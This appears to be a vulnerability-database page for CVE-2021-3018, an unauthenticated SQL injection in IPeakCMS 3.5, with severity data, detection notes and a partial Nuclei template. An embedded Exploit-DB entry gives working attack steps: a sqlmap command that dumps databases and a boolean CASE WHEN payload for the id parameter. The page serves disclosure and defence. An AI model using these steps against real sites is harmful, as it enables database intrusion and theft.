CVE-2021-3018
published 2021-01-05CVE-2021-3018: ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3.5 is vulnerable to an unauthenticated Boolean-based SQL injection via the id parameter on the /cms/print.php page.
PriorityP179critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
19.51%
97.0th percentile
ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3.5 is vulnerable to an unauthenticated Boolean-based SQL injection via the id parameter on the /cms/print.php page.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipeak | ipeakcms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Fingerprint vulnerable IPeakCMS 3.5 instances by checking the login page at /cms/ for the string 'webCMS-3.5' in the body. ↗
- →Confirm exploitation of the time-based BENCHMARK payload by checking for a response duration >= 8 seconds alongside HTTP 200 and the string 'onLoad="print();"' in the body. ↗
- →FOFA query to discover exposed IPeakCMS 3.5 instances on the internet. ↗
- →Detect exploitation attempts by monitoring GET requests to /cms/print.php containing SQL injection keywords such as BENCHMARK, CASE WHEN, or SELECT in the 'id' parameter. ↗
- ·Exploitation requires a valid numeric 'id' value that returns a page; attackers must first enumerate a valid ID (e.g., id=1) before injecting payloads. ↗
- ·The Nuclei template is marked as unverified (verified: false), so detection logic should be validated in a controlled environment before production deployment. ↗
- ·The time-based detection probe uses a 30-second timeout; network latency may cause false positives or false negatives when using duration-based detection. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
vendor_redhat5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-ww76-wxv4-qwxc: ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3
ghsa_unreviewed·2022-05-24
CVE-2021-3018 [CRITICAL] CWE-89 GHSA-ww76-wxv4-qwxc: ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3
ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3.5 is vulnerable to an unauthenticated Boolean-based SQL injection via the id parameter on the /cms/print.php page.
VulnCheck
ipeak ipeakcms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-3018 [CRITICAL] ipeak ipeakcms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
ipeak ipeakcms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3.5 is vulnerable to an unauthenticated Boolean-based SQL injection via the id parameter on the /cms/print.php page.
Affected: ipeak ipeakcms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/2024-07/aa24-207a-dprk-cyber-group-conducts-global-espionage-campaign.pdf
No detection rules found.
Exploit-DB
IPeakCMS 3.5 - Boolean-based blind SQLi
exploitdb·2021-01-06·CVSS 9.8
CVE-2021-3018 [CRITICAL] IPeakCMS 3.5 - Boolean-based blind SQLi
IPeakCMS 3.5 - Boolean-based blind SQLi
---
# Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi
# Date: 07.12.2020
# Exploit Author: MoeAlbarbari
# Vendor Homepage: https://ipeak.ch/
# Software Link: N/A
# Version: 3.5
# Tested on: BackBox Linux
# CVE : CVE-2021-3018
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))
Nuclei
IPeakCMS 3.5 - SQL Injection
nuclei·CVSS 9.8
CVE-2021-3018 [CRITICAL] IPeakCMS 3.5 - SQL Injection
IPeakCMS 3.5 - SQL Injection
ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
Template:
id: CVE-2021-3018
info:
name: IPeakCMS 3.5 - SQL Injection
author: theamanrawat
severity: critical
description: |
ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
reference:
- https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.md
- https://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.html
- https://nvd.nis
No writeups or analysis indexed.
http://packetstormsecurity.com/files/160815/IPeakCMS-3.5-SQL-Injection.htmlhttps://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.mdhttps://ipeak.chhttps://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.htmlhttps://www.amario.ch/cms/http://packetstormsecurity.com/files/160815/IPeakCMS-3.5-SQL-Injection.htmlhttps://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.mdhttps://ipeak.chhttps://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.htmlhttps://www.amario.ch/cms/
2021-01-05
Published
Exploited in the wild